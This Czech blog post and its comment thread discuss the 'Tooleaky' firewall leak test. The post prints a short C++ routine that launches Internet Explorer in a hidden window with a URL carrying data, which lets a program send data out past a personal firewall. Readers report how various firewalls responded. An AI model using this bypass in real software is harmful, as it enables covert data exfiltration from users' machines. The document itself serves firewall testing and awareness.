Vaše firewall je s velkou pravděpodobností k ničemu…
Narazil jsem dnes na takový pěkný malý prográmek, má 3 KB z webu tooleaky.zensoft.com, který krásně ukazuje, proč je Vaše firewall zcela k ničemu. Již dávno jsem psal o tom, že nejen antivirus je k ničemu, ale, že k ničemu je i samotná firewall, pokud není provázána se SandBoxem.
Zkuste si ten prográmek schválně stáhnout a spustit. Stažení i spuštění zabere 10 sekund. Pokud se Vám ukáže “success”, máte problém. Ten prográmek totiž využívá léta známé chyby řady Windows firewallů, a totiž, autorizace přístupu MSIE na internet (nutné třeba pro online Windows Update), a následné zneužití MSIE jinými programy. Stačí na to pár řádků kódu v C++:
bool TransmitAndReceiveData ( ) { // Step 1: Find the MSIE char buffer[MAX_PATH + 512]; long len = sizeof(buffer); RegQueryValueA( HKEY_LOCAL_MACHINE, "SOFTWARE\\Classes\\Applications"+ "\\iexplore.exe\\shell\\open\\command", buffer, &len); // Step 2: spawn IE in a hidden window for ( char*c = &buffer[1]; *c != 0; c++ ) if ( *c == '%' ) *c = 0; z_strcat(buffer, baseURL); z_strcat(buffer, outputString); WinExec(buffer, SW_HIDE); // Step 3: wait for the page to load int startCount = GetTickCount(); do { EnumWindows(EnumWindowsProc, 0); if ( (GetTickCount() - startCount) > 30000 ) return false; } while ( ieWnd == NULL ); // Step 4: close the window SendMessage(ieWnd, WM_SYSCOMMAND, SC_CLOSE, 0); return true; }
Takto jednoduše může libovolný virus zavolat MSIE, které je autorizováno přistupovat k internetu, a potom libovolně zasílat, co se mu zlíbí. Pěkné, ne? Pokud jste aspoň jednou navštívili s MSIE nějakou warez či porno stránku, spustili si P2P klienta, nebo nějaký “keygen”, jen tak stažený z webu, je docela dost dobře možné, že na počítači máte škůdce. A to škůdce, kterého Vaše firewall nikdy neodhalí, a nezachytí jej ani antivirus či spyware (ty se skutečně nesoustředí na nákazy získané z warez a porno odkazů)…
Microsoftí firewall toto vůbec neumí, Tiny Personal Firewall, mnou preferovaná, to umí, ZoneAlarm Pro to sice umí, ale má to defaultně vypnuté i ve verzi 5.1.
Mám firewall nastavenou tak, aby žádnej program nemohl pouštět Explorer, takže jsem teoreticky uspěl... Explorer pouštim jen v těch nejkrajnějších případech (optimalizace webu pro IE) :) Cejtim se hned víc v bezpečí, i když mám windows...
Kerio Personal Firewall se zeptal, jestli chci onomu prográmku povolit spustit IE, což nepovoluji žádnému programu, takže by se nic nestalo.
S tím my Linuxáci problém nemáme. iptables lze jednoduše nastavit tak, že zakáže vše, co nepovolíte.
Tak jsem byl ja uspesny. Sygate Personal Firewall (velmi podobny Tiny) se zeptal, zda chci pustit IE na nejakou sitenu. Ja rekl, ze ne, a program se za chvili ozval, ze se nelze pripojit. Pokud jsem mu to povolil, ukazal Success. Protoze ale nema IE defautne povolen pristup na internet (pouzivam vyhradne Mozillu, vcetne mailklienta),tak ma po hehe. IE zapinam jen v krajnim pripade, kdyz je treba neco na nem otestovat (web-stranku), ci pokud dana stranka nejde v Mozille nacist.
PS: mě osobně toto v SuSE 9.1 naprosto nevzrušuje. Nemohu mít viry, protože nemám Windows.
A kde asi myslite ze vznikly historicky prvni viry? :D Pac pocitacovy viry jsou pojem starsi nez windows... (a tim nemyslim jen DOS... prvni program ktery se dal povazovat za virus byl napsany pod unixy...)
[4]
tady presne stejnej vysledek, kerio se me zeptal, jestli chci pustit IE... samozrejme za NECHCI ;-)
PS: mě osobně toto v SuSE 9.1 naprosto nevzrušuje. Nemohu mít viry, protože nemám Windows.
treba http://www.root.cz/clanek/124 :_D
[7] a co jako? ;-) Ano, virus se dá napsat na jakýkoliv OS, ale poměr Unix versus Windows bude tak 1: 1 milión, zatímco poměr na trhu je trochu jinak..
[8] PS: mě osobně toto v SuSE 9.1 naprosto nevzrušuje. Nemohu mít viry, protože nemám Windows.
Pisete, ze nemate Windows a pritom v predchozim clanku zminujete koupi DOOMa III, na cem to tedy hrajete? ;-)
[9] na Windows XP Pro.. nicméně, jako primární OS používám SuSE Linux 9.1
[9] No on totiž id svoje hry na linux vydává, já vím určitě že na něm funguje quake3 možná, že teda i doom.
[10] Tak to jo, uz jsem myslel, ze jste jeden z takovych tech zatvrzelych "Linux only" uzivatelu, co v kazdem druhem prispevku basni, ze jejich PC jeste Windows nezazilo a pritom nekde po vecerech pari Dooma III na XPckach. :-)
Takze to vyzera tak, ze spominany programek nielenze otestuje firewall, ale vytvara na grc.com databazu, ktore pocitace z tych otestovanych tymto programom su napadnutelne.
Ktovie, kde ta databaza nakoniec skonci.
[13] grc.com je jedna z nejlepších sites na testování bezpečnosti PC, tam ke zneužití rozhodně nedojde... 3 místo ze 3.900.000 stránek na google.com ( http://www.google.com/search?q=firewall+test... )
[6] Taktéž. Kerio Personal Firewall se mne po spuštění prográmku dotáže, zda povolit připojení k grc.com. Cítím se chráněný, i když se mi můj firewall připomíná :-)
Jak zapnu ochranu v Zone Alarmu? Diky za radu.
V Zone Alarmu jsem na karte program control vyhledal IE a v kolonce access jsem nastavil otaznik - firewall se bude ptat, jestli muze program pristupovat k inetu. Po spusteni Tooleaky se me sice firewall zeptal, ale aniz bych neco potvrdil, Tooleaky oznamil Success - tak nevim :-/
[5] Viry existují pro všechny systémy, to nikdo nepopírá. Ale za to, že je počítač nakažen virem, si může uživatel sám.
Samozřejmě, když budu tak blbý, že budu v Linuxu všechno dělat jako root, tak si hraju s ohněm. Když budu vše dělat jako uživatel, vir jaksi nemá příliš šancí se šířit.
Je to jen o tom, jak chce uživatel svůj systém používat, jak ho chce mít stabilní. Ve windows je kdeco s administrátorskými právy (a uživatelé třeba o tom ani neví) a spousta uživatelů má svého uživatele s administrátorskými právy, takže virům nic nebrání v jejich činnosti.
[17] to není ono, je to tam nazvené cosi jako "Open Process" a "Advanced Program Control"
dobrý tip, Radku!
[17][19] Tak ten "Advanced Program Control" jsem nasel, ale "Open Process" ne. Chova se mi to jako jmbymu.
Nevim jestli jsem dopadl dobre - tvrdil, ze muj pocitac je prilis pomaly (P4 2,8GHz) nebo me spojeni do internetu prilis pomale (1 mbit) a nebo je grc.com mimo provoz... tak nevim
Leaktest stazenej z techto stranek (3kb) mne napsal
Success! Mam nejakou starsi verzi TinyPF ale ten bohuzel nic nezaregistroval (resp. nic nenabidnul).
Jinej test ""
mne vsak pravidlo u TinyPF povolit/zakazat nabidne.
toz nevim kde je zrada.
IMHO nazor na ne/pouzivani antiviru nesdilim, jiz
starej DOS Avast obsahoval "databazi integrity"
[23] Ve vyse uvedenem prispevku mne vypadl link takze jeste jednou link na LeakTest v1.2
http://www.grc.com/lt/leaktest.htm...
tož nevím, mně ten prográmek napsal success, i když jsem mašinu odpojil od internetu fyzicky. To je skutečně tak dobrý, že dokáže odeslat data i když nemá kudy?
Windosaci: Firewall nefirewall niektori ludia musia pouzivat IE...okna vesmiru dokoran?
"Bezpecne browsery" su exploitnutelne povacsinou este lahsie ako IE. Mozilla stale obsahuje exploity stare niekolko rokov. O pivo ze exploit na operu je otazka par hodin. Jediny dovod preco sa nevyrabaju masove exploity pre nestandardne browsery je ich male vyuzivanie - a teda maly dopyt na trhu so zombie.
Linuxaci: Nebudte naivni. Iptables vie hocico len nie obmedzovat pristup programov k netu. To ze niekto nefunguje ako root mu je tak akurat <> platne - s tym kvantom dier v kerneli je od lusera (exploitu v jeho browseri, mail klientovi, multimedia playeri, pdf prehliadaci, mno proste...) k rootovi velmi kratka cesta. Virus je len automatizovany exploit. To ze nepouzivas standarizovany system je len security by obscurity. A naivita.
Kedysi som cital zaujimavy clanok od par h4x0rov - Total cost of 0wnership.
Zaver?
Mac - 1 den prace.
Windosy - 3 dni.
"Moderne" linuxy - 6 dni.
Bezpecnost je proces, nie produkt.
Ziadna nalepka - s tucniakom, certikom bertikom, ci stevom ballmerom na krabici - bezpecnost nezaruci.
Vitaj spat v realite.
No zdravim,
ja by som sa chcel tiez spytat autora, preco tu tolko vychvaluje iba TPF. Ja netvrdim, ze TPF nie je dobry, ale urcite by som nestaval otazku tak, ze jediny schopny firewall je TPF. Ja si napriklad uplne v pohode zijem s Kerio PF, a nakolko mam zalozky NETWORK SECURITY, SYSTEM SECURITY, ATTACKS a WWW, tak si myslim, ze je to splolu s rozumne nastavenymi Windows System Policies dostatocna ochrana proti akemukolvek humusu z netu. A samozrejme pouzivam aj antivirove riesenie. Rad by som, keby ste ma presvedcili o tom, ze existuje nieco, co je mozne dosiahnut iba s TPF a nie s KPF.
No asi si myslíte,že když jste prošli tímhle testem,tak to asi bude ok,co? No zkusil jsem jeden z http://www.pcinternetpatrol.com/... stahnul sem si pc audit a spustil ho,docela vás to překvapí,přes kerio firewall se to dostane :-(
[3] a zdrojaky pred kompilaci+instalaci overujes pres el.podpis? ;)
Sygate Personal firewall odhalil uspesne hijacking a zakazal IE pristup na net i kdyz byl drive povolen :)
Zonealarm PC Security Suite s high vysroubovanou ochranou mi spolehlive zahlasila, ze se program pokousi o pristup. Takze OK
[4][6][15] to samé. msie přitom mám v sygate personal firewall povolen pro přístup na net kvůli stupid stránkám bez ptaní, samozřejmě má vypnutý activex. přesto mi firewall vyhodí okno že tooleaky.exe zkouší spustit m$ie.exe - čili neprošel.
Chcípáka jménem IE používám v dost zvláštních případech a na tyto ho taky zvlášť povoluju, takže tooleaky setřel :)
hmmm mám Tiny Firewall a přesto to hlásilo success no je fakt, že mám možná někde něco blbě nastavený ... akorát teda nevím co což mě s.... :-) fakt je že se Tiny ozval když sem ten program pustil což je ok tudíž žádnej cizák se mi jen tak na PC nepustí aby něco provedl... ale když sem mu to dočasně povolil pak už to dopadlo na succes :-) tak nevím jinak IE nepoužívám prakticky vůbec ... jel sem dlouho na Firefoxu bez větších potíží a teď testuju Operu 8.02 mno tady byla docela vychválená ale zatím mi pravidelně jednou denně sestřelí komp .... a vobčas se mi ji nedaří pustit až po restartu systému :-) ale jinak zase se mi líbí tak ještě chvilku vydržím :-)
Zablokoval jsem v ZoneAlarm přístup MSIE k čemukoliv a vyskočilo okénko, že se nelze připojit, takže já jsem v pohodě
MÁM JEDEN VÁŽNÝ DOTAZ!
Mě se ukázalo Succes, ale předtím se mi to muselo připojit přes MSIE a k tomu byl potřeba můj souhlas, protože teď používám Firefox. A to mě trápí... Jak mám úplně odstranit MSIE z mého systému, aby nedělal žádné problémy???
[36] Som uplna lama ale toto by som nedoporucoval. Ak ho definitivne odstrelis z kompu, tak tusim nejdu stahovat updaty... ale nie som si isty. Staci ked mu vo FW bloknes pristup na net natrvalo a dovidenia.
PS: Radku, skor nez ma zmazete - pisem z Holandska a administrator je magor. Tudiz mam iba anglicku klavesnicu.
Výborný tip. Norton Internet Security to umí taky, ale je to defaultně vypnuté. Bohužel to vypadá, že pro tyhle alerty neumí Permit/Block Always, takže asi poletí do koše :-)